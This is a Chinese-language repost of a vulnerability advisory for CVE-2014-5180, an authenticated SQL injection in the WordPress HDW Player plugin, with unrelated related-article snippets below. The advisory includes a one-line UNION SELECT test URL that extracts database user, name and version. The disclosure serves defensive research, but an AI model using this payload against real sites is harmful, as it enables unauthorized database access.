wp admin.php,WordPress HDW Player插件'wp-admin/admin.php' SQL注入漏洞

最新推荐文章于 2022-09-11 20:57:22 发布
最新推荐文章于 2022-09-11 20:57:22 发布
阅读量292 收藏 1
点赞数
文章标签: wp admin.php

发布日期:2014-05-28

更新日期:2014-08-08

受影响系统:

WordPress HDW Player 2.4.2

WordPress HDW Player

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 69105

CVE(CAN) ID: CVE-2014-5180

WordPress HDW Player插件可将HDW播放器嵌入到WordPress网站内。

HDW Player 2.4.2及其他版本的视频页面存在SQL注入漏洞,经过身份验证的远程攻击者可通过wp-admin/admin.php编辑操作内的id参数,利用此漏洞执行任意SQL命令。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select

1,2,user(),4,5,6,database(),8,@@version,10,11,12

建议:

--------------------------------------------------------------------------------

厂商补丁:

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://wordpress.org/plugins/hdw-player-video-player-video-gallery/

0b1331709591d260c1c78e86d0c51c18.png

潘与其
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大华半球摄像头升级程序 IPC-HDW1235C-A 升级固件
01-15
大华半球摄像头升级程序 IPC-HDW1235C-A 升级固件 升级程序 原故障是普通录像机通过ONVIF协议添加摄像头,等一会就提示用户名或者密码错误,升级程序后正常使用 升级前版本2.622 升级后版本2.680
wp admin.php,wordpress根目录wp-admin下的目录文件
weixin_29314405的博客
03-18 710
对于一个新手来学习WordPress,文件中的目录可能回事最头疼的一件事吧,因为好多的文件名,没有了解过的新手上去就会看晕的,今天小编就为大家总结出文件名字的意义是什么。wp-admin/admin.php:管理文件的核心文件。用来连接数据库,整合动态菜单数据,显示非核心控制页面等。wp-admin/admin-db.phpwp-admin/admin-footer.php:定义所有管理控制台的页...
wp admin.php,WordPress教程
weixin_30666751的博客
03-18 306
wp-admin/admin.php:管理文件的核心文件。用来连接数据库,整合动态菜单数据,显示非核心控制页面等。wp-admin/admin-db.phpwp-admin/admin-footer.php:定义所有管理控制台的页脚。wp-admin/admin-functions.php:定义了管理控制台使用的多种函数。wp-admin/admin-header.php:定义了管理控制台的上半部...
WordPress /wp-admin/users.php畸形s参数路径泄漏漏洞
weixin_30950887的博客
07-18 383
漏洞版本: WordPress 2.7.x WordPress 2.8.x WordPress 2.9.x WordPress 3.0.x WordPress 3.1.x WordPress 3.2.x WordPress 3.3.x WordPress 3.4.x WordPress 3.5 漏洞描述: WordPress是一种使用PHP语言开发的博客平台,用户...
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2661
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
hdw-dubbo-master.zip
12-03
hdw-dubbo微服务化开发平台,具有统一授权、认证后台管理系统,其中包含具备用户管理、资源权限管理等多个模块,支持多业务系统并行开发,可以作为后端服务的开发脚手架。代码简洁,架构清晰,适合学习和直接项目中...
BUFFALO巴法洛HDW-PU3中文说明书.pdf
07-11
BUFFALO巴法洛HDW-PU3是一款便携式无线硬盘,专为用户提供便捷的数据存储和分享功能。本中文说明书详细介绍了该产品的各项特性和使用方法,旨在帮助用户更好地理解和操作这款产品。 1. 布局 BUFFALO HDW-PU3的布局...
hfw2225b和hdw2225s固件包.zip
12-23
标题 "hfw2225b和hdw2225s固件包.zip" 提供的是针对大华品牌两款特定型号监控摄像头的固件升级资源。这些固件包是用于提升摄像头性能、修复已知问题或增加新功能的重要软件更新。其中,"hfw2225b" 和 "hdw2225s" ...
BUFFALO巴法洛HDW-PU3快速说明书.pdf
07-11
BUFFALO巴法洛HDW-PU3快速说明书.pdf
【转载】wordpress/wp-admin目录文件
Php is everything...
09-19 507
[url]http://cn.yflying.com/2010/06/wp-admin%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6/[/url] wordpress/wp-admin目录 wp-admin/admin.php:管理文件的核心文件。用来连接数据库,整合动态菜单数据,显示非核心控制页面等。 wp-admin/admin-db.php wp-a...
wordpress 漏洞_WordPress站点恶意JS注入漏洞分析
weixin_27565831的博客
01-26 571
Sucuri的安全研究人员检测到攻击者利用Wordpress插件漏洞进行攻击活动。该攻击活动中有超过2000个WordPress网站被黑,并重定向受害者到含有浏览器通知订阅、假的问卷调研和假的Adobe Flash下载活动的垃圾邮件站点。 JS注入该漏洞被利用后,攻击者可以注入JS脚本到站点的主体,JS脚本可以从admarketlocation[.]com和 gotosecond2[....
admin.php wordpress,Wordpress admin-ajax.php远程SQL注入漏洞
weixin_28718769的博客
03-11 1245
WordPress是一款免费的论坛Blog系统。WordPress实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击非授权访问数据库。WordPresswp-admin/admin-ajax.php文件没有正确验证对cookie参数的输入。在wp-admin/admin-ajax.php的6行:------------------[source code]------------...
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
网站安全专家
06-30 1万+
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本。可以删除网站上的任意文件,影响危害严重,甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想。截止目前该漏洞还未有被修复,如果您在使用wordpress,请尽快将wp-includes文件夹下的post.php文件改名,...
wordpress漏洞上传php文件,WordPress wp-admin/includes/file.php任意文件上传漏洞
weixin_31861847的博客
03-09 539
影响版本:WordPress <= 2.8.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress中负责上传文件的代码如下:wp-admin/includes/file.php:---[cut]---line 217:function wp_handle_upload( &$file, $overrides = false, $time = null ) {-...
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5363
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.phpwordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
HDW156-001L
最新发布
04-26
HDW156-001L是一款硬盘型号,具体的介绍如下: 1. 容量:HDW156-001L的容量是指硬盘可以存储的数据量,一般以GB或TB为单位。具体容量取决于该型号的规格,可以是几百GB到几TB不等。 2. 接口类型:HDW156-001L的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值